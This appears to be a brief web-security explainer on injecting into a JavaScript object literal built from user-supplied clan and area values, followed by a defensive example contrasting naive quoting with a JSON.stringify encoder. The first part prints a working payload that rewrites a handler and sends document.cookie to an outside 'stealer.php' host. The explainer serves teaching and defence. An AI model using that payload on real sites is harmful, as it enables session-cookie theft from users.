Consider a dictionary built from user-supplied data:
- A clan name
- An area
Even if JS keywords and most special characters are banned, a malicious user can still exploit the data.
For example, using advanced techniques such as character escaping and updating the DOM, an attacker can completely rewrite a function at will.
<script type="text/javascript">
this.character = {
  "player": "Kaƫl",
  "clan": "Losnia",
  "functions": {
    "compute": this.compute,
    "reset": this.reset,
    "giveup": this.giveup
  },
  "area": "France"
};
</script>
clan="/*
area=a*/,functions:{computer:this.compute,reset:this.reset,giveup:{d:window[ /locat/.source%2B/ion/.source]=/https:\/\/myserver.com\/stealer.php?c=/.source%2Bdocument.cookie}}//
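The following added example (not code from the original page) renders the same object literal twice, once by pasting raw values between quotes and once through a `JSON.stringify`-based encoder, and evaluates both against stub handlers. The inputs are constructed: they reuse the comment-bridging shape of the payload above with an inert `REPLACED` marker, and they assume the leading `"` is part of the `clan` value. The names `naive`, `jsLiteral`, `render`, `evaluate` and `compare` are hypothetical.

```javascript
// Added example (not from the original page). Sample inputs are constructed:
// same comment-bridging shape as the page's payload, with an inert marker.
const CLAN = '"/*'; // assumed: the leading quote is part of the value
const AREA = 'a*/,functions:{giveup:/REPLACED/.source}//';

// Vulnerable encoder: pastes the raw value between double quotes.
const naive = (v) => `"${v}"`;

// Hardened encoder: JSON.stringify escapes quotes, backslashes and control
// characters; the extra pass keeps "</script>" and U+2028/2029 out of the page.
function jsLiteral(v) {
  return JSON.stringify(String(v)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Same script body as the page's template; only the encoder differs.
function render(clan, area, encode) {
  return [
    'this.character = {',
    '"player": "Kaƫl",',
    `"clan": ${encode(clan)},`,
    '"functions": {',
    '"compute": this.compute,',
    '"reset": this.reset,',
    '"giveup": this.giveup',
    '},',
    `"area": ${encode(area)}`,
    '};',
  ].join('\n');
}

// Evaluate the rendered script against stub handlers (no DOM involved).
function evaluate(script) {
  const ctx = { compute() {}, reset() {}, giveup() {} };
  new Function(script).call(ctx);
  return ctx;
}

// Report what happened to the "giveup" handler under each encoder.
function compare(clan, area) {
  const bad = evaluate(render(clan, area, naive));
  const good = evaluate(render(clan, area, jsLiteral));
  return {
    naiveGiveup: bad.character.functions.giveup, // handler swapped for the marker
    naiveHasArea: 'area' in bad.character,       // the area key was commented out
    safeIntact: good.character.functions.giveup === good.giveup,
    safeRoundTrip: good.character.clan === clan && good.character.area === area,
  };
}

console.log(compare(CLAN, AREA));
```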